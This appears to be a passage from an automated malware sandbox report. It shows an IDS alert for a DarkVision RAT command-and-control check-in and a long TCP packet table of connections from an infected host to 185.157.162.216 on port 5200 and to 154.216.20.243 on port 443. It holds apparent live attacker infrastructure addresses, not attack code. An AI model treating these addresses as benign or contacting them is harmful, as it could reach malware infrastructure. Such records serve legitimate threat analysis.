                                                                          2024-12-08T15:11:17.202658+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.650023185.157.162.2165200TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 8, 2024 15:07:02.806296110 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.806344032 CET44349708154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:02.806416035 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.832381964 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.832406044 CET44349708154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:02.839137077 CET49707443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.839169979 CET44349707154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:02.839230061 CET49707443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.867506027 CET49707443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:02.867537022 CET44349707154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:05.087150097 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:05.206758022 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:05.207581997 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:05.208894968 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:05.328515053 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:07.060173988 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:07.060342073 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:07.080523014 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:07.123337030 CET44349708154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:07.180042028 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:07.757277012 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:07.757443905 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:07.876899004 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:07.877003908 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:07.997724056 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:08.889313936 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:08.889564991 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:09.011099100 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:09.011161089 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:09.130723000 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.029928923 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.079848051 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:10.460792065 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.462671995 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:10.501657009 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:10.583864927 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.584064960 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:10.584306002 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:10.704195976 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.901562929 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:10.954780102 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:11.689960003 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:11.736031055 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:12.250452995 CET49707443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:12.291347027 CET44349707154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:12.298985958 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:12.299026012 CET44349712154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:12.299101114 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:12.301244974 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:12.301258087 CET44349712154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:12.441374063 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:12.441530943 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:12.561295033 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:12.701493979 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:12.751694918 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:13.140050888 CET520049711185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:13.140523911 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:13.189181089 CET497115200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:13.259958029 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:13.260096073 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:13.260349035 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:13.382699966 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:13.717324018 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:13.767321110 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:14.409110069 CET44349708154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:14.409215927 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:14.409215927 CET49708443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:14.730331898 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:14.782934904 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.117863894 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:15.118024111 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.223218918 CET49715443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:15.223268986 CET44349715154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:15.223367929 CET49715443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:15.223716021 CET49715443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:15.223728895 CET44349715154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:15.237307072 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:15.793869019 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:15.815588951 CET520049714185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:15.815959930 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.845499039 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.861084938 CET497145200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.936781883 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:15.936866999 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:15.937041998 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:16.056726933 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:16.799125910 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:16.845422983 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:17.220794916 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:17.267332077 CET44349712154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:17.788969994 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:17.795542002 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:17.812360048 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:17.861061096 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:17.915055990 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:17.968492031 CET44349712154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:17.968569994 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:17.968569994 CET49712443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:18.494734049 CET520049721185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:18.495564938 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:18.548572063 CET497215200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:18.615216970 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:18.615341902 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:18.615475893 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:18.734972000 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:18.816247940 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:18.861099005 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:19.829952002 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:19.876688957 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:20.468528986 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:20.468688011 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:20.589584112 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:20.848011971 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:20.892302990 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:21.850734949 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:21.892340899 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:21.930325031 CET520049728185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:21.930888891 CET497375200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:21.970474958 CET497285200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:22.050203085 CET520049737185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:22.050278902 CET497375200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:22.050458908 CET497375200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:22.169810057 CET520049737185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:22.238320112 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:22.238357067 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:22.238605022 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:22.239363909 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:22.239378929 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:22.861504078 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:22.908091068 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:23.867211103 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:23.908063889 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:24.877361059 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:24.923579931 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.032114029 CET44349707154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.032203913 CET49707443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.064326048 CET497375200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.064681053 CET497505200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.102343082 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.102417946 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.105798006 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.105807066 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.106133938 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.153220892 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.184087992 CET520049750185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:25.184181929 CET497505200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.184242964 CET520049737185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:25.184303999 CET497375200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.184320927 CET497505200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.195341110 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.236284018 CET49715443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.279333115 CET44349715154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.384537935 CET520049750185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775043964 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775079966 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775088072 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775098085 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775121927 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775173903 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.775203943 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.775218964 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.775250912 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.879290104 CET520049709185.157.162.216192.168.2.6
                                                                          Dec 8, 2024 15:07:25.893506050 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.893527031 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.893601894 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.893620014 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.893666983 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.923583984 CET497095200192.168.2.6185.157.162.216
                                                                          Dec 8, 2024 15:07:25.967998981 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.968019962 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.968091965 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:25.968110085 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:25.968154907 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.060890913 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.060913086 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.061057091 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.061079025 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.061124086 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.089195967 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.089227915 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.089343071 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.089370012 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.089416981 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.114295959 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.114329100 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.114413977 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.114428997 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.114474058 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.167929888 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.167956114 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.168066025 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.168097019 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.168139935 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.245259047 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.245284081 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.245424986 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.245452881 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.245518923 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.259680033 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.259697914 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.259753942 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.259773016 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.259814024 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.276372910 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.276391029 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.276432037 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.276448965 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.276470900 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.276489019 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.290919065 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.290936947 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.290992975 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.291007996 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.291027069 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.291044950 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.301917076 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.301938057 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.301975965 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.301990032 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.302009106 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.302026033 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.341532946 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.341550112 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.341614008 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.341633081 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.341670990 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.354309082 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.354326963 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.354408979 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.354427099 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.354501963 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.430742979 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.430763960 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.430847883 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.430866957 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.430911064 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.439860106 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.439874887 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.439948082 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.439959049 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.439999104 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.449050903 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.449067116 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.449151993 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.449167013 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.449208975 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.457022905 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.457041025 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.457150936 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.457160950 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.457202911 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.465455055 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.465476036 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.465558052 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.465565920 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.465605974 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.474613905 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.474630117 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.474687099 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.474694014 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.474720955 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.474735975 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.532834053 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.532855988 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.532978058 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.532993078 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.533046007 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.617435932 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.617461920 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.617507935 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.617520094 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.617547035 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.617567062 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.623270035 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.623285055 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.623370886 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.623378992 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.623415947 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.630255938 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.630271912 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.630342960 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.630352974 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.630394936 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.637072086 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.637088060 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.637161970 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.637170076 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.637203932 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.644005060 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.644023895 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.644082069 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.644093990 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.644134998 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.650511026 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.650527000 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.650583029 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.650589943 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.650633097 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.657397985 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.657433987 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.657468081 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.657474995 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.657499075 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.657516956 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.725115061 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.725136042 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.725233078 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.725246906 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.725291967 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.809140921 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.809168100 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.809277058 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.809292078 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.809348106 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.815320969 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.815335989 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.815402985 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.815409899 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.815453053 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.821614981 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.821630001 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.821676016 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.821687937 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.821724892 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.827191114 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.827212095 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.827274084 CET49738443192.168.2.6154.216.20.243
                                                                          Dec 8, 2024 15:07:26.827286005 CET44349738154.216.20.243192.168.2.6
                                                                          Dec 8, 2024 15:07:26.827347994 CET49738443192.168.2.6154.216.20.243
